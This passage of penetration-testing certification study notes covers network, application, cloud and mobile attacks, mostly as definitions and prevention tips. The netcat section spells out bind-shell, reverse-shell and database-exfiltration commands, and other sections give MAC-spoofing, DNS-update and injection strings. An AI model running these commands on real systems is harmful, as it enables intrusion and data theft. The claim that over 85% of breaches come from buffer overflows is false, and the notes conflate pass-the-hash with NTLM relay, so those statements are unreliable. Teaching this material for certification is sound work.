▪ nmap -sU -p 53 --script=dns-recursion <IP>
● Checks if a server uses recursion

▪ nmap -sU -p 53 --script=dns-update --script-args=dns-

update.hostname=<domain>,dns-update.ip=<IP> <target>
● Conducts a dynamic DNS update without authentication

o How It Works
▪ Poisoning DNS cache
▪ Hijacking local DNS server
▪ Performing unauthorized zone transfer

o Prevention
▪ Use DNSSEC
● DNS Security Extensions (DNSSEC)
o Uses digital signatures based on public-key cryptography
to ensure DNS data is digitally signed by the owner
o The zone owner and the resolvers need to configure their
DNS servers to support DNSSEC

▪ Ensure servers have the latest security patches

- 83 -

o DNS Zone Transfer

▪ A method of replicating DNS database entries across a set of DNS servers

o DNS Harvesting
▪ A form of Open-Source Intelligence used to gather information about a
domain name and its associated resources

● LLMNR/NBT-NS Poisoning
o Link-Local Multicast Name Resolution (LLMNR)
▪ Based on the DNS packet formatting and allows both IPv4 and IPv6 hosts
to perform name resolution on the host if they are on the same local link

▪ Instead of LLMNR, Linux systems rely on ZeroConf using the SystemD

o NetBIOS Name Service (NBNS or NBT-NS)

▪ Part of the NetBIOS-over-TCP protocol suite that is used as a type of
name resolution inside the internal network to translate internal names
to IP addresses

▪ NBT-NS uses the host name of a system for its resolution

o By default, Windows machines will first attempt to use LLMNR and then attempt
to use NBT-NS

o Responder
▪ A command-line tool in Kali Linux that is used to poison NetBIOS, LLMNR,
and mDNS name resolution requests

- 84 -

● MAC Spoofing
o Spoofing
▪ A category of network attacks that occurs when an attacker masquerades
as another person by falsifying their identity

o Media Access Control (MAC) Address

▪ A means for identifying a device physically and allowing it to operate on a
logical topology
▪ Same subnet (IP Address - different subnets)

▪ Layer 2 devices use MAC addresses to associate which device is

connected to which physical port

▪ MAC Filtering
● Allow List
o Allowed to connect
● Block List
o Not allowed to connect
o To overcome this, simply change MAC address to another
value
▪ sudo ifconfig en0 ether <MAC address>
▪ macchanger -m <MAC Address> <interface>

● VLAN Hopping
o Virtual Local Area Network (VLAN)
▪ Used to partition any broadcast domain and isolate it from the rest of the
network at the data link layer or layer 2 of the OSI model
▪ Once you gain access to a workstation located in one VLAN, you must
break out of that VLAN to gain access to other sensitive areas of the
network

- 85 -

o VLAN Hopping
▪ A technique exploiting a misconfiguration to direct traffic to a different
VLAN without proper authorization

o Double Tagging
▪ Attacker tries to reach a different VLAN using the vulnerabilities in the
trunk port configuration

● Inner Tag
o True destination set by the attacker
● Outer Tag
o Native VLAN

▪ Double tagging is used as part of a blind attack or as part of a DoS or

stress testing attack

● Blind Attack
o One where commands are sent to the victim, but the
attacker doesn't get to see any of the responses

▪ Prevention
● Change default configuration of native VLAN
● Never add user devices into the native VLAN

- 86 -

o Switch Spoofing
▪ Attacker attempts to conduct a Dynamic Trunking Protocol (DTP)
negotiation

▪ Prevention
● Always configure switch ports to have dynamic switch port modes
disabled by default

o MAC Table Overflow Attack

▪ Overloaded CAM tables result to switches “failing open” and beginning to
act like a hub

● Switch
o Selectively transmits frames
● Hub
o Repeats every frame it receives

● NAC Bypass
o Network Access Control (NAC)
▪ A technology that is used to keep unauthorized users or devices from
accessing a private network

o Types of NAC Solutions

▪ Persistent

- 87 -

● A piece of software installed on a device requesting access to the

network

▪ Non-persistent
● Requires the users to connect to the network and log in to a web-
based captive portal to download an agent that scans their
devices for compliance

▪ Agentless NAC/Volatile Agent

● Installs the scanning engine on the domain controller instead of
the endpoint device

o Methods
▪ Exploit an authorized host
▪ Make device look like something else
● Most networks segment out VoIP devices and printers into their
own separate VLANs

● On-Path Attack
o On-Path Attack
▪ Occurs when an attacker puts themself between the victim and the
intended destination

▪ Methods
● ARP poisoning
● DNS poisoning
● Introducing a rogue WAP
● Introducing a rogue hub/switch

o Replay
▪ Occurs when valid data is captured by the attacker and is then repeated
immediately, or delayed, and then repeated

- 88 -

o Relay
▪ Occurs when the attacker inserts themselves in between the two hosts

o The challenge is when encryption is enforced by the hosts

o SSL Stripping
▪ Occurs when an attacker tricks the encryption application into presenting
the user with an HTTP connection instead of an HTTPS connection

o Downgrade Attack
▪ Occurs when an attacker attempts to have a client or server abandon a
higher security mode in favor of a lower security mode

● Password Attacks
- 89 -

o Hash digest is the result of a one-way hashing algorithm that protects the
passwords stored in the database

o Cybersecurity professionals attempt to implement strong password security

policies

o Password Cracker
▪ Used to attempt to break a user’s password by using either a dictionary
attack or by using brute force techniques
● John the Ripper
● Cain and Abel

o Dictionary Attack
▪ Uses a list of common passwords, words, and phrases to attempt to
guess the password

o Brute Force Attack

▪ Attempts to break a password by guessing every single possible
combination of numbers, letters, and special characters

o Rainbow Table
▪ A precomputed hash value table that contains known passwords used for
offline password cracking

o Prevention
▪ Strong password security policies
▪ Complex passwords
▪ Password change at least every 60 days
▪ Failed login attempt lockouts or delays

o Password Spraying
▪ Uses a dictionary of common passwords on multiple accounts to bypass
authentication mechanisms

o Credential Stuffing
▪ Tests stolen user account names and passwords against multiple
websites
▪ Prevention

- 90 -

● Do not reuse any passwords across different websites

● Utilize two-factor authentication

● Pass the Hash

o Pass the Hash (New Technology LAN Manager (NTLM) Relay Attack)
▪ A network-based attack where the attacker steals hashed user
credentials and uses them as-is to try to authenticate to the same
network the hashed credentials originated on
▪ It is possible to present the hash without cracking the original password
to authenticate to network protocols such as SMB and Kerberos

▪ Pass the hash can be used to elevate privileges

▪ When pass the hash is used on a local workstation, then an attacker can
gain local admin privileges

o Mimikatz
▪ An open-source application that allows users to view and save
authentication credentials to perform pass the hash attacks

▪
Mimikatz scans system memory for cached passwords processed
by the Local Security Authority Subsystem Service (lsass.exe)
o Kerberoasting
- 91 -

▪ Allows any domain user account with a service principal name to set a
service granting ticket in the ticket granting service

▪ Process
● Get the user Service Principal Names (SPNs) to identify all
accounts that are good candidates for Kerberoasting
● Get a service ticket from one of the SPNs that looks like a good
target, such as a server
● Dump the service ticket to a file
● Crack the account’s plaintext password, which can be done
offline, using that service ticket file

▪ The service accounts or server accounts are the ones most vulnerable to
Kerberoasting

▪ Golden Ticket
● A master ticket that comes from the Kerberos ticket-granting
ticket (TGT) which can be used for any Kerberos service
▪ Silver Ticket
● A ticket-granting service ticket that is only good for certain
Kerberos-specific service

● Netcat
o Netcat (nc)
▪ A command line utility for reading and writing raw data over a network
connection

o Shell
▪ An interactive command interface, just like the one you are using when
you enter command into your Kali Linux terminal

o Bind Shell
▪ Attacker installs a listening port onto the victim’s machine, to which the
attacker can connect

- 92 -

▪ Bind shells became less effective as security increased and firewalls were
installed at network boundaries

▪ Set Up Listener
● nc -l -p 443 -e cmd.exe
▪ Connect to Listener
● nc 10.1.0.1 443

o Reverse Shell
▪ Attacker installs a listener on their own workstation and configures a
listening port

▪ Set Up Listener
● nc -l -p 443
▪ Connect to Listener
● nc 10.1.0.2 443 -e cmd.exe

o Set Up a Listener to Receive

▪ nc -l -p 53 > database.sql

o Send a File to Listener

▪ type database.sql | nc 10.1.0.2 53

- 93 -

Application Vulnerabilities
● Application Vulnerabilities
o Domain 3: Attacks and Exploits
▪ Objective 3.3
● Given a scenario, research attack vectors and perform application-
based attacks

o Importance
▪ Create exploits to take advantage of them and gain access to a given
enterprise network
▪ Provide mitigation recommendations in the final report at the end of the
engagement

o OWASP Top 10
▪ Represents a broad consensus on the most critical security risks to web
applications and provides information on how to prevent them

o Server-Side Request Forgery

▪ A type of attack that takes advantage of the trust relationship between
the server and the other resources it can access
▪ Occurs when a web app fetches a remote resource without validating the
URL
- 94 -

▪ Prevention
● Segment remote resource access functionality into separate
networks
● Enforce a deny by default firewall or ACL policy
● Ensure web apps sanitize and validate any client-supplied input
data

● Race Conditions
o Race Condition
▪ Occurs when the resulting outcome from execution processes is directly
dependent on the order and timing of certain events, which then failed to
execute in the order and timing intended by the developer
▪ Occurs when a computer tries to race itself in the processing of certain
data
▪ Found where multiple threads attempt to write to a variable or object at
the same memory location
▪ Race conditions often happen outside the normally logged processes in a
system

o Dereferencing
▪ Occurs when the code attempts to remove the relationship between a
pointer and the thing it points to

o TOCTOU
▪ Occurs when there is a change between when an app checks a resource
and when the app uses the resource

o Mutually Exclusive Flag (Mutex)

▪ Acts as a gatekeeper to a section of code so that only one thread can be
processed at a time

o Deadlock
▪ Occurs when a lock cannot be removed from the resource

o Properly design and test any locks or mutexes

- 95 -

● Buffer Overflows
o Buffer Overflow
▪ Occurs when a process stores data outside the memory range allocated
by the developer
▪ Over 85% of data breaches were caused by a buffer overflow

o Buffer
▪ A temporary storage area that a program uses to store data

o Stack
▪ Reserved area of memory where the program saves the return address
when a function call instruction is received

o “Smashing the Stack”

▪ Occurs when an attacker fills up the buffer with NOP instructions

- 96 -

o Non-Operation (NOP) Instruction

▪ Tells the system to do nothing and simply go to the next instruction

o Prevention
▪ Maintain a good patch management program

▪ Always use secure coding practices

● Boundary checking
● Input validation

▪ Use Address Space Layout Randomization

● Address Space Layout Randomization (ASLR)
o Prevents an attacker’s ability to guess where the return
pointer for a non-malicious program has been set to call
back to

▪ Use Data Execution Protection

● Data Execution Protection (DEP)
o Blocks applications that attempt to run from protected
memory locations

● Executable code stored in the user data location will be marked as

non-executable

- 97 -

o Integer Overflow
▪ Occurs when a computed result from an operation is too large to fit into
its assigned variable type for storage
▪ Integer overflows and buffer overflows can lead to arbitrary code
execution, and in turn, privilege escalations
▪ Upper/lower boundary

▪ Size variable bounds appropriately to avoid wasting resources

● Authentication and References

o Broken Authentication
▪ Insecure authentication mechanisms that can allow an attacker to gain
entry

o Prevention
▪ Utilize multi-factor authentication
▪ Never use default credentials
▪ Verify passwords are strong and not found on published password
exploitation lists
▪ Use limits or delays to slow failed login attempts and brute force
attempts
▪ Use server-side session management and long and randomized session
identifiers
▪ Never pass a session identifier as a URL parameter
▪ Implement session timeouts and expiring session identifications
- 98 -

o Insecure Direct Object Reference

▪ Used to manipulate URLs to gain access to a resource without requiring
proper authentication

▪ Prevention
● Always use secure coding practices
● Always implement proper access control techniques to verify a
user’s authorization

● Improper Headers
o HTTP Response Headers
▪ Used to control how web servers operate to increase security during
operations

▪ Protects against:
● Cross site request forgery
● Cross site scripting
● Downgrade attack
● Cookie hijacking
● User impersonation
● Clickjacking

o HTTP Strict Transport Security (HSTS)

▪ Allows a web server to notify web browsers to only request using HTTPS
and not HTTP

- 99 -

o HTTP Public Key Pinning (HPKP)

▪ Allows HTTPS websites to resist impersonation by attackers using mis-
issued or fraudulent certificates

o X-Frame-Options
▪ Prevents clickjacking from occurring

o X-XSS-Protection
▪ Enables cross site scripting filter in the web browser

o X-Content-Type-Options
▪ Prevents the browser from interpreting files as something other than
what they are

o Content-Security-Policy (CSP)
▪ Impacts how web browsers render pages

o X-Permitted-Cross-Domain-Policies
▪ Sends a cross-domain policy file to the web client and specifies if the
browser has permission to handle data across domains

o Referrer-Policy
▪ Governs which referrer information should be included with requests
made

o Expect-CT
▪ Indicates browsers to evaluate connections to the host emitting the
header for Certificate Transparency compliance

o Feature-Policy
▪ Allows developers to selectively enable and disable use of various
browser features and APIs

● Code Signing
o Code Signing
▪ Digitally signing executables and scripts to confirm the software author
and guarantee code has not been altered

- 100 -

▪ Code signing just validates that the code is ready for distribution

● Vulnerable Components

o Client-Side Processing
▪ Puts the load on the end user’s machine instead of the server

o Server-Side Processing
▪ Considered to be more secure and trustworthy for most use cases

o JavaScript Object Notation/Representational State Transfer (JSON REST)

▪ Representational State Transfer (REST)
● A client/server model for interacting with content on remote
systems over HTTP

▪ JavaScript Object Notation (JSON)

● A text-based message format used with RESTful web service

▪ REST and JSON

● Mobile devices
▪ SOAP and XML
● Security/transactional services

o SOAP and XML

▪ Simple Object Access Protocol (SOAP)
● Used for exchanging structural information for web services

- 101 -

● Conduct inspection and sanitization of inputs and outputs to the

application

o Browser Extension
▪ Provides expanded functionality or features to a web browser
▪ Flash, ActiveX, JavaScript
● Remove Adobe Flash installations on your network’s clients

▪ COM
● Communication
▪ DCOM
● Distribution

▪ Only install extensions from trusted vendors

o Hypertext Markup Language (HTML5)

▪ A powerful web application programing language that enables feature-
rich applications

▪ Vulnerabilities
● Cross-domain messaging
● Cross-origin resource sharing
● Web sockets
● Server sent events
● Local, offline, and web storage
● Client-side databases
● Geolocation requests
● Web workers
● Tabnabbing
● Sandbox frames

o Asynchronous JavaScript and XML (AJAX)

▪ A grouping of related technologies used on the client side to create
asynchronous web applications
▪ Same-origin policy
▪ AJAX is considered more secure than some other methods

- 102 -

o Machine Code
▪ Basic instructions written in machine language that can be directly
executed by the CPU
▪ Specific to a type of processor and can only be run on the processor
where it was compiled

o Bytecode
▪ An intermediate form of code produced by a compiler that can be
translated into machine code

● Software Composition
o Software Composition Analysis
▪ A process by which software can be analyzed for open-source component

▪ A vulnerability in a third-party dependency becomes a vulnerability in

your application

▪ When using third-party dependencies, you are responsible for the code
you write and did not write
● Dependency-Check
● Dependency-Track

o Frameworks
▪ Apache Struts
▪ Microsoft .NET
▪ Ruby on Rails
▪ Ramaze
▪ Hibernate
▪ Django
▪ Twisted
▪ web.py

o Poor Exception Handling

▪ Occurs when a program is not written to anticipate problems or errors

- 103 -

o Security Misconfiguration
▪ Any issue related to poorly implemented or documented security
controls

o Weak Cryptography Implementation

▪ Occurs when an out-of-date algorithm or cipher is being used in a
modern system
▪ Utilize a well-known and documented encryption standard

o Information Disclosure
▪ The act of stealing information from an application or during the
communication process between two applications

o End of Support/End of Life Issues

▪ End of Life
● No longer sold

▪ End of Support
● No longer updated

o Code Injection
▪ An exploitation technique that runs malicious code with identification of
a legitimate process
▪ Ensure applications provide input and output validation

o Regression Issues
▪ Occur when a source code is changed which may have introduced a new
vulnerability or have broken some existing functionality

o Regression Testing
▪ Validates any software change does not produce any unintended
consequences

- 104 -

Application Attacks
● Application Attacks
o Domain 3: Attacks and Exploits
▪ Objective 3.3
● Given a scenario, research attack vectors and perform application-
based attacks

● Directory Traversals
o Directory Traversal
▪ Allows access to files, directories, or commands that may or may not be
connected to the web document root directory
▪ In a directory traversal, an attacker tries to navigate upwards and out of
the web document root directory

● Unix/Linux
o ../

● Windows running IIS

o ..\

- 105 -

▪ Directory traversals may be used to access any file on a system with the
right permissions
▪ Attackers may try to use %2E%2E%2F instead of ../

o File Inclusion
▪ Allows an attacker to download a file from an arbitrary location or upload
an executable or script file to open a backdoor

▪ Remote File Inclusion

● Executes a script to inject a remote file into the web app or the
website

▪ Local File Inclusion

● Adds a file to the web app or website that already exists on the
hosting server

● Cross-Site Scripting (XSS)

o Cross-Site Scripting (XSS)
▪ Injects a malicious script into a trusted site to compromise the site’s
visitors

▪ Cross-site scripting (XSS) is a powerful input validation exploit

▪ Method
● Attacker identifies input validation vulnerability within a trusted
website
● Attacker crafts a URL to perform code injection against the
trusted website
● The trusted site returns a page containing the malicious code
injected
● Malicious code runs in the client’s browser with permission level
as the trusted site

▪ XSS breaks the browser’s security and trust model

- 106 -

▪ Types
● Non-Persistent XSS
o Happens once
● Persistent XSS
o Embedded code

o Document Object Model (DOM) XSS

▪ Exploits the client’s web browser using client-side scripts to modify the
content and layout of the web page
▪ DOM XSS runs with the logged in user’s privileges of the local system

● Cross-Site Request Forgery (CSRF)

o Session Management
▪ Enables web applications to uniquely identify a user across several
different actions and requests

o Cookie
▪ Text file used to store information about a user when they visit a website
● Non-Persistent Cookie (Session Cookie)
o Reside in memory
● Persistent Cookie
o Stored in browser cache

o Session Hijacking
▪ Disconnects a host and then replaces it with his or her own machine by
spoofing the original host IP address
● Session cookie theft
● Non-random tokens

o Session Prediction
▪ Predicts a session token to hijack the session
▪ Session tokens must be generated using non-predictable algorithm and
must not reveal any info about the session’s client

o Cross-Site Request Forgery (CSRF)

▪ Exploits a session that was started on another site and within the same
web browser

- 107 -

▪ Prevention
● Ensure user-specific tokens are used in all form submissions
● Add randomness and prompt for additional information for
password resets
● Require users to enter their current password when changing it

● SQL Injections

o Code Injection
▪ Inserts additional information or code through a data input form from a
client to an application

o SQL Injection
▪ Injects an SQL query through the input form a client uses to send data to
a web application
● URL parameters
● Form fields
● Cookies
● POST data
● HTTP headers

▪ Prevention
● Use input validation and sanitize any data received from users
● Web application firewall

▪ If you see ‘OR 1=1; on the exam, it’s an SQL injection

- 108 -

● XML Injections/Exploitation/Vulnerability
o Extensible Markup Language (XML)
▪ Used by web apps for authentication, authorization, and other types of
data exchange
▪ Conduct input validation and sanitization of the data received

▪ Vulnerabilities
● Spoofing
● Request forgery
● Code injection

o XML Bomb (Billion Laughs Attack)

▪ XML encodes entities that expand to exponential sizes, consuming
memory on the host and potentially crashing it

o XML External Entity (XXE) Attack

▪ Attempts to embed a request for a local resource

o To prevent XML vulnerabilities from being exploited, use proper input validation

o Unlike XML, HTML or JavaScript use defined keywords for each bracketed entry

● Other Injection Attacks

o LDAP Injection
▪ Lightweight Directory Access Protocol (LDAP)
● Protocol for accessing and maintaining distributed directory
information services over an Internet Protocol network

▪ Prevention
● Input validation
● Input sanitization

o Command Injection
▪ Occurs when a threat actor executes arbitrary shell commands on a host
via a vulnerable web application

- 109 -

▪ Prevention
● Input validation

▪ Only accept an IP address or a domain name as input

o Process Injection
▪ A method of executing arbitrary code in the address space of a separate
live process

▪ Prevention
● Endpoint security
● Security kernel module
● Least privilege

- 110 -

Cloud Attacks
● Cloud Attacks
o Domain 3: Attacks and Exploits
▪ Objective 3.4
● Given a scenario, research attack vectors and perform attacks on
cloud technologies

● Attacking the Cloud

o Malware Injection Attack
▪ Attempts to add an infected service implementation module to the cloud
service
▪ The attacker is attempting to insert malicious code into a cloud service or
server

o Side-Channel Attack
▪ Aims to measure or exploit the indirect effects of a system instead of
targeting the code or program directly

▪ Prevention
● Data encryption
● Multi-factor authentication
● Routine monitoring and auditing

o Direct-To-Origin (D2O) Attack

▪ Attempts to bypass reverse proxies to directly attack the original network
or IP address of the cloud-based server

- 111 -

o Denial of Service (DoS) Attack

▪ Used to attack any protocol, device, operating system, or service to try
and disrupt the services it provides to its users

▪ Resource Exhaustion Techniques

● Amplification/Volumetric Attack
o Used to saturate the bandwidth of a given network
resource

● Fragmentation of Requests
o Sending multiple fragmented HTTP requests to a server

▪ Other DoS Attacks

● Packet flood
● SYN flood
● HTTP flood
● DNS flood
● DNS amplification
● NTP amplification

● Credential Harvesting
o Credential Harvesting
▪ Any attack designed to steal usernames and passwords

- 112 -

o Account Takeover
▪ Attackers silently embed themselves within an organization to slowly gain
additional access or infiltrate new organizations
▪ Account takeovers are very hard to detect

o Privilege Escalation
▪ Occurs when an attacker gains the rights of another user or an
administrator

● Vertical
o User to admin/root account

● Horizontal
o User to another user account

o Vulnerabilities to Exploit
▪ Security Account Manager (SAM) File
● Contains the hashed passwords of every user on a given Windows
system or domain

▪ Windows UAC

▪ Weak Process Permissions

▪ Shared folders
● Many organizations do not enable access controls to their files
and folders on a shared drive

▪ Dynamic Link Library (DLL)

● A library file that contains code that can be used or referenced by
more than one program

▪ Writable services
● Writeable services and unquoted service paths can be used to
inject a malicious application that will be launched during startup

▪ Missing patches

- 113 -

● Misconfigured Assets
o Misconfigured Cloud Asset
▪ Account, storage, container, or other cloud-based resource that is
vulnerable to attack because of its current configuration

o Cloud Federation
▪ The combination of infrastructure, platform services, and software to
create data and applications that are hosted by the cloud
▪ Identify who’s responsible for the approval of new services and servers,
as well as for their vulnerability and patch management

o Identity and Access Management (IAM)

▪ Defines how users and devices are represented in the organization and
their associated permissions to resources within the organization’s cloud
federation

▪ Personnel Type
● Used in IAM to define identities for an organization’s employees
● An organization should ensure they are providing good end-user
security training

▪ Endpoint Type
● Used for resources and devices that are used by personnel to gain
legitimate access to the network
● Use centralized EMS
● Validate endpoints

▪ Server Type
● Used for mission-critical systems that provide a service to other
users and endpoints
● Encryption schemas
● Digital certificates
● Configuration hardening

▪ Software Type
● Used by IAM to uniquely identify a software’s provenance prior to
installation

- 114 -

● A public key infrastructure should be used to provide higher levels

of authentication and authority

▪ Role Type
● Used to support the identities of various assets and associated
permission and rights to the roles or functions of those resources

o Privileged Account
▪ Allows the user to perform additional tasks, such as installing software,
upgrading operating system, modifying configurations, and deleting
software or files

o Shared Account
▪ Any account where the password or authentication credential is shared
between more than one person

o Object Storage
▪ Bucket
● Amazon Web Services
▪ Blob
● Microsoft Azure

▪ An object is the equivalent of a file, and a container is the folder

▪ Object ACLs
▪ Container policies
▪ Access management authorizations

o Cross-Origin Resource Sharing (CORS) Policy

▪ Allows objects to be read from multiple domain names and displayed
properly in the end user’s browser
▪ OWASP Top 10 lists CORS policy misconfiguration under “Broken Access
Control”

- 115 -

o Container
▪ An image that contains everything needed to run a single application or
microservice

▪ Vulnerabilities
● Embedded malware
● Missing critical security updates
● Outdated software
● Configuration defects
● Hard-coded cleartext passwords

- 116 -

● Metadata Service Attack

o Metadata Service
▪ Used to provide data about an organization’s instances so that they can
configure or manage their running instances
▪ Some big breaches were tied back to attacks against the metadata
service as the initial attack vector

o Server-Side Request Forgery (SSRF)

▪ A type of attack that takes advantage of the trust relationship between
the server and the other resources it can access
● Exploits vulnerable applications
● Communicates with the Metadata Service
● Extracts credentials
● Pivots into cloud account

o Metadata service attack is a form of server-side request forgery attack that

focuses on taking metadata about the instances

o Stay up to date with the latest exploits and techniques as you enter penetration
testing

● Software Development Kit (SDK)

o Software Development Kit (SDK)
▪ A package of tools dedicated to a specific programming language or
platform commonly used by developers when creating apps
▪ SDKs can contain vulnerabilities if the author who built those functions
didn’t do a good job

- 117 -

o SDK libraries are designed to be consistent, approachable, diagnosable,

dependable, and idiomatic

o Keep up to date with the latest vulnerabilities discovered and released in these
different SDKs

● Auditing the Cloud

o ScoutSuite
▪ An open-source tool written in Python that can be used to audit instances
and policies created on multicloud platforms by collecting data using API
calls

o Prowler
▪ An open-source security tool used for security best practices
assessments, audits, incident response, continuous monitoring,
hardening, and forensics readiness for AWS cloud services
- 118 -

▪ Prowler is a command-line tool that can create a report in HTML, CSV,

and JSON formats

o Pacu
▪ An exploitation framework used to assess the security configuration of an
Amazon Web Services (AWS) account

o CloudBrute
▪ Used to find a target’s infrastructure, files, and apps across the top cloud
service providers, including Amazon, Google, Microsoft, DigitalOcean,
Alibaba, Vultr, and Linode

o Cloud Custodian
▪ An open-source cloud security, governance, and management tool
designed to help admins create policies based on different resource types
▪ Cloud Custodian is a stateless rules engine used to manage AWS
environments by validating and enforcing the environment against set
standards

o It is great for defining rules that enable a cloud infrastructure that is secure and
optimized

- 119 -

Attacks on Mobile Devices

● Attacks on Mobile Devices
o A lot of smartphones remain unpatched and misconfigured
o Domain 3: Attacks and Exploits
▪ Objective 3.5
● Explain common attacks and vulnerabilities against specialized
systems

● Enterprise Mobility Management

o Enterprise Mobility Management (EMM)
▪ Enables centralized management and control of corporate mobile devices
● Tracking
● Controlling
● Securing
▪ Policies and tools

o Mobile Device Management (MDM)

▪ Technical controls

o Remote Wipe
▪ Reverts a device back to its factory default settings and sanitizes the
sensitive data from the device’s onboard storage

o Device Certificates
▪ Trust Certificate
● Globally identifies a trusted device within an organization
- 120 -

● A trust certificate can be copied by an attacker

▪ User-Specific Certificate
● Assigned to a device to uniquely identify it on the network

o Firmware Update
▪ Updates the baseband of the radio modem used for cellular, Wi-Fi,
Bluetooth, NFC, and GPS connectivity

● Deployment Options
o Corporate-Owned, Business Only (COBO)
▪ Purchased by the company for use by the employees only for work-
related purposes
▪ Most secure
▪ Most restrictive
▪ Most expensive

o Corporate-Owned, Personally-Enabled (COPE)

▪ Provides employees with a company procured device for work-related
and/or personal use

o Choose Your Own Device (CYOD)

▪ Allows employees to select a device from an approved list of vendors or
devices

o Bring Your Own Device (BYOD)

▪ Allows employees to bring their own devices into work and connect
them to the corporate network
▪ BYOD brings up privacy concerns and is the most difficult to secure

o Virtual Mobile Infrastructure (VMI)

▪ Like VDI, but utilizes a virtualized mobile operating system

● Mobile Reconnaissance Concerns

o Digital Forensics
▪ Ensure devices are set up to encrypt stored data and cloud backups

- 121 -

o Wearable Technology
▪ Any type of smart device worn on or implanted in the body

▪ Wearables collect a wide range of biometric and health data

o Wireless Eavesdropping

o Consider how to conduct digital forensics on wearable technologies owned by

the company ahead of time

● Mobile Device Insecurity

o Jailbreaking
▪ Enables a user to obtain root privileges, sideload apps, change or add
carriers, and customize the interface of an iOS device

o Rooting
▪ Custom Firmware/Custom ROM
● A new Android OS image that can be applied to a device

▪ Systemless Root
● Does not modify system partitions or files and is less likely to be
detected than a custom ROM

o Sideloading
▪ Installs an app on a mobile device directly from an installation package
instead of an official store

- 122 -

o Unauthorized app stores

▪ Android and iOS devices block the installation of third-party applications
by default

o Device Configuration Profiles/Protocols

▪ Implement settings and restrictions for mobile devices from centralized
mobile device management systems
▪ Profiles are mainly used for security, but can also provide a vulnerability

o Full Device Encryption

▪ iOS
● 256-bit unique ID

▪ Android v6
● 128-bit AES keys

▪ Android v7
● File-based encryption

▪ Android v9
● Metadata encryption

▪ MicroSD Hardware Security Module (HSM)

● Stores the different cryptographic keys securely inside the mobile
device, like a TPM module in a desktop or laptop

o VPN
▪ Some MDM solutions provide a third-party VPN client

- 123 -

● Secure socket layer

● Transport layer security
● Other

▪ Operating System
● Always on
▪ Application
● Per-app basis
▪ Web-Based
● Location masking

o Location Services
▪ Refers to how a mobile device is allowed to use cellular data, Wi-Fi, GPS,
and Bluetooth to determine its physical location

o Geolocation
▪ Uses a device’s ability to detect its location to determine if access to a
particular resource should be granted

o Geofencing
▪ Creates virtual boundaries based on geographical locations and
coordinates

o Geotagging
▪ Adds location metadata to files or devices

● Multifactor Authentication
o Identification
▪ Provides identity
o Authentication
▪ Validates identity

o Multifactor Authentication (MFA)

▪ Uses two or more means (or factors) to prove a user’s identity
● Knowledge (Something you know)
● Ownership (Something you have)
● Characteristic (Something you are)

- 124 -

o False Acceptance Rate (FAR)

▪ Rate that a system authenticates a user as
authorized or valid when they should not have
been granted access to the system

o False Rejection Rate (FRR)

▪ Rate that a system denies a user as authorized or
valid when they should have been granted access
to the system

o Crossover Error Rate (CER)

▪ An equal error rate (ERR) where the false
acceptance rate and false rejection rate are equal

● Location (Somewhere you are)

● Action (Something you do)

▪ High-security systems often use multifactor authentication

o OTP Algorithms
▪ Time-Based One-Time Password (TOTP)
● Computes password from a shared secret and the current time

▪ HMAC-Based One-Time Password (HOTP)

● Computes password from a shared secret and is synchronized
across the client and the server

o Authentication Factors
▪ In-Band Authentication
● Relies on an identity signal from the same system requesting the
user authentication

▪ Out-of-Band Authentication
● Uses a separate communication channel to send the OTP or PIN

o Implement 2FA or MFA that relies on out-of-band authentication system for

high-security networks

- 125 -

● Mobile Device Attacks

o iOS is considered a “walled garden” as it is more restrictive
o Android was developed to be an open operating system

o Overreach of Permissions
▪ Occurs when third-party apps request more permissions than they
actually need
▪ Overreach of permissions can be used by penetration testers to their
advantage

o Social Engineering
▪ Vishing
▪ Smishing
▪ Spamming

o Bluetooth
▪ Bluejacking
● Sending unsolicited messages to a Bluetooth device
● Sending information

▪ Bluesnarfing
● Making unauthorized access to a device via Bluetooth connection
● Taking information

● Malware Analysis
o Sandboxing
▪ A computing environment that is isolated from a host system to
guarantee that the environment runs in a controlled and secure fashion
● Determine if the file is malicious
● Effects of the file on a system
● Dependencies with files and hosts

▪ Sandboxing allows you to quickly test malware in multiple environments

▪ Features
● Monitor system changes
● Execute known malware
● Identify process changes

- 126 -

● Monitor network activity

● Monitor system calls
● Create snapshots
● Record file creation/deletion
● Dump virtual machine’s memory

▪ The sandbox host (virtual machine) should not be used for any other
purpose except malware analysis

▪ Create a honeypot lab with multiple sandboxed machines and Internet

access to study malware and its C2

o Reverse Engineering
▪ The process of analyzing the structure of hardware or software to reveal
more about how it functions
▪ Malware reverse engineers can determine who wrote the code by
learning their patterns
▪ Malware writers often obfuscate the code before it is assembled or
compiled to prevent analysis

o Disassembler
▪ A computer program that translates machine language into assembly
language

o Machine Code
▪ The binary code executed by the processor, typically represented as 2
hex digits for each byte

o Assembly Code
▪ The native process or instruction set used to implement a program

o Decompiler
▪ Software that translates a binary or low-level machine language code into
higher level code

o High-Level Code
▪ Real or pseudocode in human readable form that makes it easier to
identify functions, variables, and programming logic used in the code

- 127 -

o Reverse engineers attempt to identify malware by finding strings to use as a

signature for rule-based detection

▪ Strings
● Any sequence of encoded characters that appears within the
executable file
● If the malware contains a string with a function called
InternetOpenUrl, and another string that is a URL, it probably
attempts to download something from that web address
● The Strings tool will dump all strings with over three characters in
ASCII or Unicode encoding

o Program Packer
▪ A method of compression in which an executable is mostly compressed
and the part that isn’t compressed contains the code to decompress the
executable
▪ A packed program is a type of self-extracting archive
▪ A packed program does not necessarily mean it is malicious as many
proprietary software also uses packing to deter theft and piracy
▪ Packed malware can mask string literals and effectively modify its
signatures to avoid triggering signature-based scanners

● Mobile Device Tools

o Drozer
▪ A complete security audit and attack framework that provides the tools
to use and share public exploits for the Android OS

o Android APK Decompiler (APKX)

▪ A tool that can extract an APK file, an Android binary, or application back
to its Java source code
o APK Studio
▪ A cross-platform Integrated Development Environment (IDE) used for
writing the source code to make job applications for the Android
operating system

- 128 -

o Android SDK (APK SDK)

▪ A large set of tools, libraries, documentation, code samples, processes,
and guides created specifically for the Android OS

o Frida
▪ An open-source tool that provides custom developer tools for
penetration testers when conducting application pentesting on mobile
apps
▪ Frida supports both iOS and Android applications, as well as Windows,
macOS, and Linux

o Objection
▪ A runtime mobile exploration toolkit that is built to help assess the
security posture of mobile applications, without requiring the device to
be jailbroken

o Needle
▪ An open-source, modular framework used to streamline the security
assessment process on iOS application
▪ Frida is a better choice for iOS exploitation as Needle has already been
decommissioned

o Ettercap
▪ A comprehensive toolkit for conducting on-path attacks

o Mobile Security Framework (MobSF)

▪ An automated, all-in-one mobile application pentesting, malware
analysis, and security assessment framework capable of performing both
static and dynamic analysis
o Burp Suite
▪ Allows for the interception, inspection, and modification of the raw
traffic passing through
▪ Burp Suite has a special module designed to test iOS devices
